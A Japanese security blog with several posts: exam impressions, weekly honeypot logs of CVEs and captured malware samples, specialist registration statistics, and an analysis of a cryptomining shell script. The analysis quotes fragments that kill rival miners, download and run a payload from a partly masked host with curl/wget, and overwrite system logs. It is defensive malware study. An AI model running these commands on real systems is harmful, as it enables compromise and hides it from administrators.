ばぁど・うぉっちんぐ

セキュリティに強いWeb屋。自由と春を求めて羽ばたく渡り鳥。

このブログはGoogle Analyticsを利用しています

2019年度春季情報処理安全確保支援士の試験をさらっと見た

前回に引き続きサラッと見ました。

少し仕事にも絡んでくるところだったので、前回よりも少し真面目に解いております。

午前II

17/25

問題番号 正誤 問題番号 正誤
1 × 14
2 × 15
3 16
4 17
5 18 ×
6 19
7 20 ×
8 21
9 × 22
10 23
11 24 ×
12 25 ×
13 ×

結果はギリギリ合格笑

試験勉強した上で望めば、ケアレスミスなくて済んだかもしれない。

以下は特に個人的に気になった設問。

問2 OCSPの役割を問う問題

OCSPとは、TCP/IPネットワークを通じてデジタル証明書(公開鍵証明書)の有効性を問い合わせる手順を定めたプロトコル(通信規約)。暗号化やデジタル署名に用いるX.509証明書が何らかの理由により有効期限前に失効している場合、そのことを速やかに知ることができる。

下記より引用 e-words.jp

こんなプロトコルすっかり忘れていた。でも、なんかCRL関連だったというのは思い出したのでウかエの2択までは絞り込めた。(絞り込んだうえで間違えた)

問5 仮想通貨におけるクリプトジャッキング

クリプトジャッキング(cryptojacking)とは、仮想通貨の「マイニング」(「採掘」の意)を不正に行うこと。マイニングとは、仮想通貨の取引に必要な計算に協力した対価として仮想通貨を獲得できる仕組みだ。

下記より引用 securityblog.jp

クリプトジャッキングという単語がわからなかった。なんとなく自分の中でイメージして回答したら当たっていた。ラッキー。

とはいえ、仮想通貨に関する問題が増えてきたなというイメージ。これからもこの傾向が続くのだろうか。

最新の参考書を買っていればここら辺の仮想通貨に関する単語とかも掲載されていそうですね(手元にあるの2017年度のものなので既に情報が古い・・・)

問10 CSRF脆弱性の対策

IPAが好きな問題だなーという印象。ここら辺はIPAが出している安全なWebサイトの作り方とかAppGoatで勉強していれば、余裕なはず。 もちろん、Webアプリの脆弱性を勉強するなら、徳丸本もいいですよね。

問18 無線LANにおける隠れ端末問題

隠れ端末問題 (かくれたんまつもんだい、hidden node problem)とは、ネットワーク通信の分野において、ALOHAや、CSMA/CA、IEEE 802.11などのプロトコルで発生する有名な問題である。

下記より引用 ja.wikipedia.org

単語自体を知らなかった・・・

なんか意味合い的に、無線LANの無許可の利用についてかな?とか想像したけど、大きく外しましたね。悔しい。

午後I

個人的に選択するなら、問1か問2ですね。

問1

Webサイトのセキュリティに関する問題

今回は同一生成ポリシーに関する問題でしたね。

基本的にJSONP使うなり、CORSでサーバー側で設定するなりして、よりセキュアな方法で実装してあげるのがベター。

JSONPだとリクエストしている内容が個人情報とか外部に漏洩してはいけないようなものを提供していればアウトという認識。理由は、スクリプトの中身書き換えられて攻撃者に任意のリクエストを行えるようにしてしまうため。

だから、今回の問題のようにCORSをサーバー側で設定してあげる方が無難ですね。

問2

クラウドサービスに関する問題

そろそろくると思っていた、認証周りのお話が来ましたね。 OTPとかパスワードレスとかが話題に上がっておりました。 パスワード認証に関しては、もうそろそろ全体的に見直しがかかってほしいところですね・・・

あと公衆無線LANはできるだけ使わないようにしましょう。

問3 

IoT製品に関する問題。 ゲームに関する問題というのがなかなか新しい気がしました。

TRMなどが出てきて、問2とはまた違った内容。 どちらかいうとハード面での知識も求められるような気がしました。

午後II

問1

マルウェアに関する問題。

マルウェアに感染した端末があり、外部に情報が流出しました。

それらをFWなどのネットワーク機器を用いてどのように検知することができたかや対策をどう練ればよかったかという問題ですかね。

マルウェアに対する対策に加えて無線LANに関する知識なども求められており、個人的には少し苦手な問題です。

問2

情報セキュリティ強化に関する問題

情報セキュリティのルールや運用ポリシーが紹介された上で、情報漏洩が発生してしまったのでそれの対策に関する問題のようですね。

マルウェアに感染して、外部に情報流出というのは問1と同じ流れだなと思いました。

まとめ

個人的な予測としては、サプライチェーン攻撃とか、働き方改革をネタにしたリモートワークを取り入れる時のセキュアな制度とか、ビジネスメール詐欺くるかなと思ったけど、来なかったですね。

まさかの公開鍵などを用いた認証が二回も出るというね。 この公開鍵周り勉強していない人だったら、詰んでたかもしれないですね。

ばぁどのハニーポット・うぉっちんぐ -ハニーポット止めました-

大変残念なお知らせですが、9月より運用していたハニーポットを止めました。

理由は主にお財布と相談した結果になります(恥)

せっかくなのでハニーポットから何を得たのか、反省点などをまとめておきます。

ハニーポットを運用して得たもの

リアルの攻撃に触れる機会を得ることができたこと

サーバー建てて実際にリアルの攻撃を肌で感じることができたのが楽しかったです。

攻撃者は様々な攻撃を自動化して、至る所で攻撃できる隙を狙っていることがよくわかりました。昨年の11月からセキュリティエンジニアとして働いているのですが、常に攻撃を肌で感じることができたのは、とても良い経験でした。

特に攻撃者が配置したシェルを読めたのが嬉しかった笑

ultrabirdtech.hatenablog.com

ultrabirdtech.hatenablog.com

効率化(自動化)の重要性を知ることができたこと

効率化のためにPythonスクリプトを書いて、レポートの出力機能を自動化しました。

github.com

このレポート出力の自動化がとても大きかった。 ハニーポットで採取したマルウェアをvirus totalに問い合わせて結果を表でまとめていたのですが、これが手作業でやるのとでは1時間ほど工数が違ってくる笑

途中から観察するハニーポットも増やしたため、自動化せざるおえなかったです。

最近crontabに設定して、土曜日の朝に起きたらレポートが出来上がっているようにしたのだけれども、もう少し早くやればよかった・・・

定期的なアウトプットを行うことによる達成感

ハニーポットを運用するからには一定期間でアウトプットしようと毎週ハニーポット観察日誌を投稿し続けました。

ultrabirdtech.hatenablog.com

お財布の事情がなければ、今後も続いていたと思います。 こういう継続する系は得意みたいです笑

ハニーポッターの方々と交流することができたこと

主にTwitter 上でですが笑

色々と絡んでいただいた方ありがとうございました。

一度、ハニーポッター技術交流会にも参加させていただき、僕もハニーポット界隈でもっと頑張ろうと思っていたのですが、今回このような判断をすることになってしまい心残りがあります。

ただ、一時的なものなのでまた帰って来ようとは思っております。

その時はまた絡んでいただけると嬉しいです。

反省すること

機能が豊富すぎた

T-Potは私にとって機能が豊富すぎました。

様々なハニーポットの詰め合わせなのですが、一つ一つを把握しきることができず持て余し気味でした。

もっと時間を費やせば得られるものは沢山あったと思っております。

コストが高かった

T-Potは筆者にとってはコストがかかりすぎており、負担が多すぎました。

T-Potは先ほど言った通り、機能が豊富にありました。 その分サーバーに費用をかける必要があり、一度ハニーポットが動かなくなったこともありました。

ultrabirdtech.hatenablog.com

その反省を踏まえて、高スペックなサーバーを選んだのですがやはり財布が・・・苦笑

今後の展望

また、いつかハニーポッターとして戻ってきたいと思っています。

その時、T-Potにするかどうかは少し悩み中です。

ハニーポットは色々な種類があり、低コストで運用できるものもあるのでそちらも検討したいと思っています。

また、8月頃に再開したいです。

※ 念の為記述しますが、最近の「不正指令電磁的記録に関する罪」で不明確な基準で逮捕されている件と本件は一切関係ありません

ばぁどのハニーポット・うぉっちんぐ - 2019/04/07 ~ 2019/04/12 -

ハニーポット観察日記としての定期アウトプットです。

観察期間:2019年 04月06日 00:00:00 - 2019年04月12日 23:59:59

CVE

CVE 検知した回数 前回比
CVE-2003-0818 630 +630
CVE-2010-3055 10 -8
CVE-2005-4050 9 0
CVE-2014-3120 3 +2
CVE-2014-0160 2 -14
CVE-2017-7269 2 -3
CVE-2008-4250 2 +2
CVE-2010-0569 2 +2
CVE-2014-3566 1 +1

CVE-2003-0818が205も大量の検地が行われました。 www.cvedetails.com

攻撃種別

f:id:UltraBirdTech:20190413080418p:plain

攻撃種別 カウント数 % 前回カウント数
known attacker 63953 96.36% 34833
bad reputation 2173 3.27% 3499
合計 66369
平均(集計2018年11月〜) 57020回

マルウェア

Cowrie

Total: 14

File Name Date Type Detection Rate
tmpPjmzgx 2019/04/06 03:31:08 ELF 32-bit LSB executable 39/56
tmpfzJmjZ 2019/04/07 19:52:18 ELF 32-bit LSB executable 37/60
tmpLoP3La 2019/04/09 03:30:56 ELF 32-bit LSB executable 40/59
tmpMw5Kzv 2019/04/09 06:42:05 empty 0/59
f8c28666f... 2019/04/09 06:42:36 ASCII text 0/57
cd9728c21... 2019/04/09 06:43:05 ELF 32-bit LSB executable 32/56
bb530b115... 2019/04/09 06:43:44 ELF 32-bit LSB executable 20/60
tmp1SxjAb 2019/04/09 13:16:57 ELF 32-bit LSB executable 40/59
3f6d2a1c4... 2019/04/09 20:16:20 Bourne-Again shell script 16/54
20190409-... 2019/04/09 20:16:20 empty 0/57
13f85ac5f... 2019/04/09 20:16:21 ELF 64-bit LSB executable 18/60
tmpgpTsrK 2019/04/10 03:32:36 ELF 32-bit LSB executable 41/59
tmpo3rGGB 2019/04/10 19:57:51 ELF 32-bit LSB executable 41/59
b33b30c3c... 2019/04/10 20:38:36 Bourne-Again shell script executable (binary data) 28/55

Dionaea

Total: 59

File Name Date Type Detection Rate
ce223b231... 2019/04/06 01:17:28 PE32 executable (DLL) (GUI) Intel 80386 57/64
ac0c78b07... 2019/04/06 01:28:01 PE32 executable (DLL) (GUI) Intel 80386 61/70
a48ca7b40... 2019/04/06 02:09:34 PE32 executable (DLL) (GUI) Intel 80386 55/68
6e72ad805... 2019/04/06 04:29:50 PE32 executable (DLL) (GUI) Intel 80386 59/66
d3891f56a... 2019/04/06 06:05:30 PE32 executable (DLL) (GUI) Intel 80386 59/66
f6740d11f... 2019/04/06 07:31:29 PE32 executable (DLL) (GUI) Intel 80386 58/68
33d373e26... 2019/04/06 07:51:38 PE32 executable (DLL) (GUI) Intel 80386 61/68
1afe2241e... 2019/04/06 08:21:22 PE32 executable (DLL) (GUI) Intel 80386 63/70
46db9ef54... 2019/04/06 10:41:49 PE32 executable (DLL) (GUI) Intel 80386 58/69
2ed7fcc93... 2019/04/06 13:16:59 PE32 executable (DLL) (GUI) Intel 80386 52/63
8c3ac09b9... 2019/04/06 14:00:19 PE32 executable (DLL) (GUI) Intel 80386 60/67
95ae8e32e... 2019/04/06 14:00:27 PE32 executable (DLL) (GUI) Intel 80386 59/66
cd99e5e4f... 2019/04/06 14:32:19 PE32 executable (DLL) (GUI) Intel 80386 58/65
0f0e3e6da... 2019/04/06 14:47:14 PE32 executable (DLL) (GUI) Intel 80386 59/70
24899e33d... 2019/04/06 20:58:12 PE32 executable (DLL) (GUI) Intel 80386 52/67
e8feae1b8... 2019/04/06 21:16:54 PE32 executable (DLL) (GUI) Intel 80386 56/71
9789106a0... 2019/04/06 22:08:04 PE32 executable (DLL) (GUI) Intel 80386 60/70
1cf9eb370... 2019/04/07 00:32:53 PE32 executable (DLL) (GUI) Intel 80386 60/69
4f53357da... 2019/04/07 01:50:51 PE32 executable (DLL) (GUI) Intel 80386 63/71
be9bdee97... 2019/04/07 11:28:06 PE32 executable (DLL) (GUI) Intel 80386 61/69
aa718a028... 2019/04/07 12:55:33 PE32 executable (DLL) (GUI) Intel 80386 64/71
ae7fa92c8... 2019/04/07 15:39:58 PE32 executable (DLL) (GUI) Intel 80386 58/67
8b88b25cf... 2019/04/07 17:45:24 PE32 executable (DLL) (GUI) Intel 80386 49/66
dbff8fcc3... 2019/04/07 21:34:05 PE32 executable (DLL) (GUI) Intel 80386 63/71
7823636f9... 2019/04/07 22:28:57 PE32 executable (DLL) (GUI) Intel 80386 62/71
7e6be27b0... 2019/04/07 23:07:19 PE32 executable (DLL) (GUI) Intel 80386 56/66
a0d2b1000... 2019/04/08 01:59:56 PE32 executable (DLL) (GUI) Intel 80386 52/62
4d2750db1... 2019/04/08 05:41:43 PE32 executable (DLL) (GUI) Intel 80386 57/66
84c9cedb3... 2019/04/08 09:42:17 PE32 executable (DLL) (GUI) Intel 80386 57/67
dc39340c4... 2019/04/08 10:05:52 PE32 executable (DLL) (GUI) Intel 80386 60/69
f361db5db... 2019/04/08 10:20:09 PE32 executable (DLL) (GUI) Intel 80386 57/65
5265fc314... 2019/04/08 10:29:48 PE32 executable (DLL) (GUI) Intel 80386 57/66
c4b2a6c65... 2019/04/08 19:53:48 PE32 executable (DLL) (GUI) Intel 80386 59/68
59b5090fa... 2019/04/08 20:17:44 PE32 executable (DLL) (GUI) Intel 80386 59/67
460d95455... 2019/04/08 20:46:50 PE32 executable (DLL) (GUI) Intel 80386 48/69
78eae7fce... 2019/04/08 21:38:56 PE32 executable (DLL) (GUI) Intel 80386 58/66
77b6ceac2... 2019/04/08 22:11:24 PE32 executable (DLL) (GUI) Intel 80386 58/66
ed03cfcc8... 2019/04/08 23:17:41 PE32 executable (DLL) (GUI) Intel 80386 58/65
6d0270440... 2019/04/09 04:23:54 PE32 executable (DLL) (GUI) Intel 80386 58/66
b02aa3805... 2019/04/09 04:55:24 PE32 executable (DLL) (GUI) Intel 80386 54/64
4afaacf62... 2019/04/09 06:57:54 PE32 executable (DLL) (GUI) Intel 80386 54/63
b88cc22e7... 2019/04/09 10:43:21 PE32 executable (DLL) (GUI) Intel 80386 54/64
e21988022... 2019/04/09 11:29:46 PE32 executable (DLL) (GUI) Intel 80386 59/69
e4c553cab... 2019/04/09 12:47:21 PE32 executable (DLL) (GUI) Intel 80386 57/66
3553aeb71... 2019/04/09 12:56:46 PE32 executable (DLL) (GUI) Intel 80386 61/69
f9a03a7d8... 2019/04/09 13:24:46 PE32 executable (DLL) (GUI) Intel 80386 54/64
54dd9593f... 2019/04/09 14:41:35 PE32 executable (DLL) (GUI) Intel 80386 63/71
005fa5b54... 2019/04/09 15:13:45 PE32 executable (DLL) (GUI) Intel 80386 57/66
76ee7e319... 2019/04/09 20:17:43 PE32 executable (DLL) (GUI) Intel 80386 58/67
4eaed7bb8... 2019/04/10 02:12:57 PE32 executable (DLL) (GUI) Intel 80386 54/67
ca9fc4bdb... 2019/04/10 05:30:45 PE32 executable (DLL) (GUI) Intel 80386 40/68
3162139f5... 2019/04/10 06:26:54 PE32 executable (DLL) (GUI) Intel 80386 59/69
5203fba68... 2019/04/10 12:33:12 PE32 executable (DLL) (GUI) Intel 80386 -
bff0aa659... 2019/04/10 14:36:33 PE32 executable (DLL) (GUI) Intel 80386 59/69
386f93106... 2019/04/10 14:59:59 PE32 executable (DLL) (GUI) Intel 80386 58/67
f2ca20d34... 2019/04/10 15:46:27 PE32 executable (DLL) (GUI) Intel 80386 57/68
06a935e7f... 2019/04/10 16:28:05 PE32 executable (DLL) (GUI) Intel 80386 59/66
f418da2e3... 2019/04/10 17:53:26 PE32 executable (DLL) (GUI) Intel 80386 56/62
99cd95db9... 2019/04/11 02:34:58 PE32 executable (DLL) (GUI) Intel 80386 57/66

所感

crontabの設定難しい・・・

ハニーポット #ハニーポット観察

情報処理安全確保支援士統計データ 2019年04月01日更新分

情報処理安全確保支援士のばぁどです。

2019年04月1日に情報処理安全確保支援士の方が新しく登録されました。

今回も前回と同じようにまとめていこうと思います。 前回記事は下記。

ultrabirdtech.hatenablog.com

2019年04月登録者

2019年04月登録者は下記記事にもありますが、新しく1,052名の方が登録されました。

www.ipa.go.jp

今回の更新で、情報処理安全確保支援士は合計で18,330名になりました。

情報処理安全確保支援士登録者数の変遷

前回(2018年10月)の登録状況が特殊だったので登録者数も大幅に減少しましたね。

2017年度4月 2017年度10月 2018年度4月 2018年度10月 2019年度4月
合計 4,172人    2,822人 2,206 人 8,215 人 1,052人

参考データ

下記のデータを参考に集計しております。

情報処理安全確保支援士検索サービス

riss.ipa.go.jp

各種PDF

情報処理安全確保支援士合格発表時のまとめ資料。

下記ページでリンクと言う形で提供されている。 www.ipa.go.jp

※下記はPDFのリンク先なので、リンク切れの可能性あり。

統計情報

1. 男女構成

2017年度(春) 2017年度(秋) 2018年度(春) 2018年度(秋) 2019(春)
3,945 人 2,660 人 2,073 人 7,697人 988人
227 人    162 人 133 人 517人 64人

2. 年齢構成

2017年度(春) 2017年度(秋) 2018年度(春) 2018年度(秋) 2019年度(春)
10代 4 3 3 2 0
20代 320     293 264 656 154
30代 1642     1135 813 3,025 364
40代 1642     1056 813 3,392 349
50代 507     320 292 1,059 177
60代 57     15 20 79 8
70代 ----     ---- 2 1 2

今回は10代の登録者はいなかったようですね。

3. 住所

下記、PDFで公開されています。

https://www.ipa.go.jp/files/000069252.pdf

東京がダントツですね。

www.ipa.go.jp

4. 所属企業・団体

あまり前回と変わらないです。 登録人数を順位としてみてもあまり上下はありませんでした。

※情報処理安全確保支援士が40名以上の企業のみ掲載

企業名・団体名 登録人数
富士通株式会社 436
株式会社日立製作所 392
日本電気株式会社 252
SCSK株式会社 225
KDDI株式会社 205
株式会社日立ソリューションズ 197
NECソリューションイノベータ株式会社 170
株式会社ラック 147
株式会社日立システムズ 102
株式会社富士通ソーシアルサイエンスラボラトリ 100
富士ソフト株式会社 97
株式会社大塚商会 95
株式会社日立ソリューションズ・クリエイト 80
トレンドマイクロ株式会社 71
日本電気通信システム株式会社 69
NRIセキュアテクノロジーズ株式会社 68
株式会社野村総合研究所 65
伊藤忠テクノソリューションズ株式会社 58
NECネッツエスアイ株式会社 57
日本ユニシス株式会社 56
株式会社日立公共システム 53
東日本電信電話株式会社 50
アクセンチュア株式会社 44
TIS株式会社 44
株式会社NTTデータ 43
三菱電機インフォメーションシステムズ株式会社 40

まとめ

一応今回もやってみました。

登録者数も控え気味になったので、あまり変化はないですね。

2020年に向けてどう盛り上がるか期待です。

不審なシェルをハニーポットで採取したので中身を解析してみる

ハニーポットで久々にシェルが置かれていたので、中身を読んで解析をしてみました。

2019年4月6日の記事で確認できたマルウェアです。

ultrabirdtech.hatenablog.com

取得したマルウェアについて

仮想通貨をマイニングするシェルが置かれていました。

Virustotal

いくつかのベンダーの解析結果は仮想通貨をマイニングするシェルだという結果が出ています。

Linux/CoinMiner.GL

後、最後の方で特定のURLに繋いで次のマルウェアをDLしているようなので、そのような記載もされております。 Trojanなのでトロイの木馬をDLするのですかね。

Trojan-Downloader.Shell.Miner.y

www.virustotal.com

トレンドマイクロの記事

下記のようにトレンドマイクロさんでも同じようなシェルを確認しています。

シェル内に記述されているURLが同じなので、同系統のマルウェアのようです。

blog.trendmicro.co.jp

シェルファイルの中身

注意1:セキュリティ面を考慮して伏せ字を使用する箇所があります。

注意2:マルウェアは全文掲載はしません。この記事の内容だけではマルウェアが完成しないように配慮しております。

注意3:怪しいURLなどは絶対にアクセスしないでください。

プロセスをkill & フォルダを削除

# ファイル、フォルダを削除する
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
・
・

pkill はプロセス名を指定してプロセスをkillするコマンドですね。

# プロセスをKillしている
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
・
・

ps auxfgrep 結果から条件に一致するもののプロセスを殺している。

・
・
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
・
・

netstat の結果からも同様に殺していますね。

・
・
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
・
・

このような記述が続いております。 一般的にマルウェアがこのような動きをする理由は、自分自身のプロセスの動きを邪魔するプロセスを殺しにきているからですね。

ファイルをDLする

ファイルをDLしています。 120秒でタイムアウトするように設定されていますね。 一応URL全部完成できないように伏せ字にしています。(他のページ見れば再現できますが、アクセスはしないでくださいね)

# curl でファイルを取得する(■は伏せ字)
(curl -fsSL --connect-timeout 120 http://yxarsh[.]■■■■/■■■■ -o /tmp/r1x||wget http://yxarsh[.]■■■■/■■■■ -O /tmp/r1x)

# 取得したファイルの権限を変更
chmod +x /tmp/r1x

# ファイル実行
/tmp/r1x

ログの上書き

最後にsecurecronなど複数のログを消してます(0で上書いている)

・
・
echo 0>/var/log/secure
echo 0>/var/log/cron
・
・

b関数とd関数

function b() {
pkill -f sourplum
・
・
・

}
function d() {
chattr -i /tmp/r1x
・
・
・
}

b関数とd関数が定義されていました。 b関数は主に自分自身を動きやすくするため邪魔するプロセスを殺したり、フォルダを作成するような機能が記述されています。

d関数は次に使用するマルウェアをDLするような記述がされていました。

私が記述的に面白いなと思ったのが下記の呼び出し部分。

・
・
b
d
・
・

この、bd だけで関数呼び出せるのは簡潔ですね。

今回のように100行くらいで完結しているファイルであれば、この一文字以上の情報はいらないですね。

まとめ

久々にハニーポットに置かれたシェルの中身を呼んだ。 マルウェアを解析する際は攻撃者が何を考えて配置してくるかということを考えると、解析もはかどりますね。

逮捕されないかビクビクしながらやっております。 もっと気軽にアウトプットできるような世の中になってほしいという意思を込めて、少し怖いけど記事にしました。

ばぁどのハニーポット・うぉっちんぐ - 2019/03/30 ~ 2019/04/05 -

ハニーポット観察日記としての定期アウトプットです。

観察期間:2019年 03月30日 00:00:00 - 2019年04月04日 23:59:59

CVE

CVE 検知した回数 前回比
CVE-2005-0045 205 +205
CVE-2010-3055 18 -4
CVE-2014-0160 16 0
CVE-2005-4050 9 +8
CVE-2017-7269 5 +2
CVE-2015-1427 3 +1
CVE-2017-5638 2 +2
CVE-2014-3120 1 +1

珍しくCVE-2005-0045が205も大量の検地が行われました。 www.cvedetails.com

攻撃種別

f:id:UltraBirdTech:20190406093118p:plain

攻撃種別 カウント数 % 前回カウント数
known attacker 34833 90.08% 55931
bad reputation 3499 8.99% 4692
合計 38669
平均(集計2018年11月〜) 56575回

国別データ

普段はあまりまとめていないのですが、今回は特色があったのでまとめます。

イランからの攻撃を大量に検知しました。

一週間の国別のデータ

f:id:UltraBirdTech:20190406093503p:plain

国名 攻撃回数 %
イラン 29856 31.6%
フランス 22402 23.71%
アメリ 16055 16.99%
中国 13282 14.06%
ロシア 5427 5.74%
その他 - -

いつもなら上位に入っているアメリカ、中国をおさえるかたちでイランからの攻撃量が多かったです。

国別の時間によるデータ

f:id:UltraBirdTech:20190406093529p:plain

一時的にイランからの攻撃がとても多くなっているのが分かります。

イランからの攻撃データ

Cowrieによる検知が大半でした。 f:id:UltraBirdTech:20190406094431p:plain

マルウェア

Cowrie

Total: 27

File Name Date Type Detection Rate
tmprm7iMn 2019/03/30 03:30:44 ELF 32-bit LSB executable 35/54
5ab400ec0... 2019/03/30 03:57:53 ASCII text 0/57
d1858ce41... 2019/03/30 03:57:53 ASCII text 0/58
8779e030c... 2019/03/30 03:57:53 ASCII text 0/57
0293300dd... 2019/03/30 03:57:53 ASCII text 0/57
20ceeed36... 2019/03/30 03:57:53 ASCII text 0/55
f6426a2b8... 2019/03/30 03:57:53 ASCII text 0/58
d660d1120... 2019/03/30 03:57:53 ASCII text 0/54
512893f96... 2019/03/30 03:57:53 ASCII text 0/55
b33b30c3c... 2019/03/30 04:36:48 Bourne-Again shell script executable (binary data) 27/55
a52e5c9d3... 2019/03/30 14:56:04 OpenSSH RSA public key 0/57
tmpZ35HY4 2019/03/30 20:05:44 ELF 32-bit LSB executable 35/54
20190330-... 2019/03/31 06:33:10 empty 0/59
3f6d2a1c4... 2019/03/31 06:33:10 Bourne-Again shell script 11/55
13f85ac5f... 2019/03/31 06:33:11 ELF 64-bit LSB executable 16/59
b01ae8eba... 2019/03/31 08:44:14 ASCII text 0/56
tmpEyc6RI 2019/03/31 19:55:16 ELF 32-bit LSB executable 39/57
tmpcMD8UU 2019/04/01 03:31:20 ELF 32-bit LSB executable 35/52
tmpzgfgSo 2019/04/01 20:35:39 ELF 32-bit LSB executable 35/52
tmpGhMZBP 2019/04/02 20:21:42 ELF 32-bit LSB executable 38/56
20190403-... 2019/04/03 10:13:10 empty 0/59
tmpDRhlNi 2019/04/03 13:00:08 ELF 32-bit LSB executable 36/55
tmpIEYb3I 2019/04/03 21:11:01 ELF 32-bit LSB executable 36/55
tmpkUh9CB 2019/04/04 02:23:27 ELF 32-bit LSB executable 37/55
tmp8OzrOe 2019/04/04 14:21:37 ELF 32-bit LSB executable 37/55
tmpS0NGs8 2019/04/04 20:15:22 ELF 32-bit LSB executable 37/55
tmpytMtWy 2019/04/05 10:16:01 ELF 32-bit LSB executable 38/55

Dionaea

Total: 115

File Name Date Type Detection Rate
996c2b2ca... 2019/03/30 04:26:56 PE32 executable (DLL) (GUI) Intel 80386 61/71
3550fe2f7... 2019/03/30 04:55:17 data 14/56
6a139899a... 2019/03/30 05:29:47 PE32 executable (DLL) (GUI) Intel 80386 60/70
8831cfc4b... 2019/03/30 05:37:03 PE32 executable (DLL) (GUI) Intel 80386 50/70
44bc540ed... 2019/03/30 05:47:45 PE32 executable (DLL) (GUI) Intel 80386 59/67
8c81ab1ed... 2019/03/30 08:30:49 PE32 executable (DLL) (GUI) Intel 80386 53/70
cd99e5e4f... 2019/03/30 08:49:15 PE32 executable (DLL) (GUI) Intel 80386 56/65
0f2ee8f0e... 2019/03/30 10:57:21 PE32 executable (DLL) (GUI) Intel 80386 52/68
414a3594e... 2019/03/30 11:02:12 PE32 executable (DLL) (GUI) Intel 80386 59/69
8295334fe... 2019/03/30 11:02:19 PE32 executable (DLL) (GUI) Intel 80386 59/69
db1d89ef8... 2019/03/30 12:08:18 PE32 executable (DLL) (GUI) Intel 80386 58/66
e9e1cc1d3... 2019/03/30 15:24:34 PE32 executable (DLL) (GUI) Intel 80386 54/69
a4d49eaf6... 2019/03/30 15:29:50 PE32 executable (DLL) (GUI) Intel 80386 58/68
ae12bb54a... 2019/03/30 16:09:23 PE32 executable (DLL) (GUI) Intel 80386 59/71
eb189ce6c... 2019/03/30 16:15:02 PE32 executable (DLL) (GUI) Intel 80386 57/69
0ab2aeda9... 2019/03/30 16:49:12 PE32 executable (DLL) (GUI) Intel 80386 58/66
0b1ddeaf4... 2019/03/30 17:05:16 PE32 executable (DLL) (GUI) Intel 80386 59/69
8215323ed... 2019/03/30 17:51:29 PE32 executable (DLL) (GUI) Intel 80386 60/71
ce494e90f... 2019/03/30 20:36:25 PE32 executable (DLL) (GUI) Intel 80386 58/66
219d5bce1... 2019/03/30 21:48:03 PE32 executable (DLL) (GUI) Intel 80386 53/64
ef894d1c6... 2019/03/31 02:32:28 PE32 executable (DLL) (GUI) Intel 80386 56/64
8041b41ab... 2019/03/31 02:46:23 PE32 executable (DLL) (GUI) Intel 80386 53/63
c16edec91... 2019/03/31 04:20:36 PE32 executable (DLL) (GUI) Intel 80386 57/65
e4cc98445... 2019/03/31 05:42:00 PE32 executable (DLL) (GUI) Intel 80386 57/66
af76bbae1... 2019/03/31 06:26:56 PE32 executable (DLL) (GUI) Intel 80386 55/65
c38d168c1... 2019/03/31 13:17:16 PE32 executable (DLL) (GUI) Intel 80386 54/65
3b22590fd... 2019/03/31 14:35:08 PE32 executable (DLL) (GUI) Intel 80386 61/70
337897f57... 2019/03/31 15:36:00 PE32 executable (DLL) (GUI) Intel 80386 56/67
d253b19d8... 2019/03/31 18:14:30 PE32 executable (DLL) (GUI) Intel 80386 56/66
0e3e5e700... 2019/03/31 19:21:56 PE32 executable (DLL) (GUI) Intel 80386 57/66
a55b9addb... 2019/03/31 20:03:44 PE32 executable (DLL) (GUI) Intel 80386 56/65
ce223b231... 2019/03/31 20:21:26 PE32 executable (DLL) (GUI) Intel 80386 58/66
a9ea052fb... 2019/03/31 21:28:30 PE32 executable (DLL) (GUI) Intel 80386 56/71
dbff8fcc3... 2019/03/31 23:41:39 PE32 executable (DLL) (GUI) Intel 80386 57/65
cf4f46336... 2019/04/01 01:16:32 PE32 executable (DLL) (GUI) Intel 80386 59/67
5f4c11dd7... 2019/04/01 03:05:13 PE32 executable (DLL) (GUI) Intel 80386 46/69
3991dae77... 2019/04/01 04:54:50 PE32 executable (DLL) (console) Intel 80386 23/65
235e9af4c... 2019/04/01 06:04:58 PE32 executable (DLL) (GUI) Intel 80386 49/66
78eae7fce... 2019/04/01 08:33:27 PE32 executable (DLL) (GUI) Intel 80386 61/69
33d373e26... 2019/04/01 09:30:00 PE32 executable (DLL) (GUI) Intel 80386 61/69
8fa0e5dd9... 2019/04/01 09:44:37 PE32 executable (DLL) (GUI) Intel 80386 60/70
ed979ce49... 2019/04/01 10:14:44 PE32 executable (DLL) (GUI) Intel 80386 56/64
9ba5379aa... 2019/04/01 11:16:39 PE32 executable (DLL) (GUI) Intel 80386 54/64
1bb736b97... 2019/04/01 11:42:42 PE32 executable (DLL) (GUI) Intel 80386 60/68
5d2755276... 2019/04/01 12:28:04 PE32 executable (DLL) (GUI) Intel 80386 54/68
24ad1977f... 2019/04/01 12:45:04 PE32 executable (DLL) (GUI) Intel 80386 59/68
4a5d4a82c... 2019/04/01 13:32:07 PE32 executable (DLL) (GUI) Intel 80386 55/64
bf7e570fb... 2019/04/01 13:41:48 PE32 executable (DLL) (GUI) Intel 80386 54/64
2f76b88b4... 2019/04/01 14:12:25 PE32 executable (DLL) (GUI) Intel 80386 58/66
00c9e54f5... 2019/04/01 14:12:57 PE32 executable (DLL) (GUI) Intel 80386 58/66
dbc927f7b... 2019/04/01 16:43:23 PE32 executable (DLL) (GUI) Intel 80386 55/67
cab74b35a... 2019/04/01 16:51:45 PE32 executable (DLL) (GUI) Intel 80386 54/64
54dd9593f... 2019/04/01 17:27:12 PE32 executable (DLL) (GUI) Intel 80386 55/65
09d2ecb96... 2019/04/01 19:02:47 PE32 executable (DLL) (GUI) Intel 80386 60/69
aa7d98d15... 2019/04/01 23:53:27 PE32 executable (DLL) (GUI) Intel 80386 60/69
431c1bf6a... 2019/04/02 02:16:00 PE32 executable (DLL) (GUI) Intel 80386 59/68
da4c98715... 2019/04/02 02:28:52 PE32 executable (DLL) (GUI) Intel 80386 56/65
474ecb2fa... 2019/04/02 02:37:58 PE32 executable (DLL) (GUI) Intel 80386 48/65
06d6a33dd... 2019/04/02 03:12:51 PE32 executable (DLL) (GUI) Intel 80386 59/69
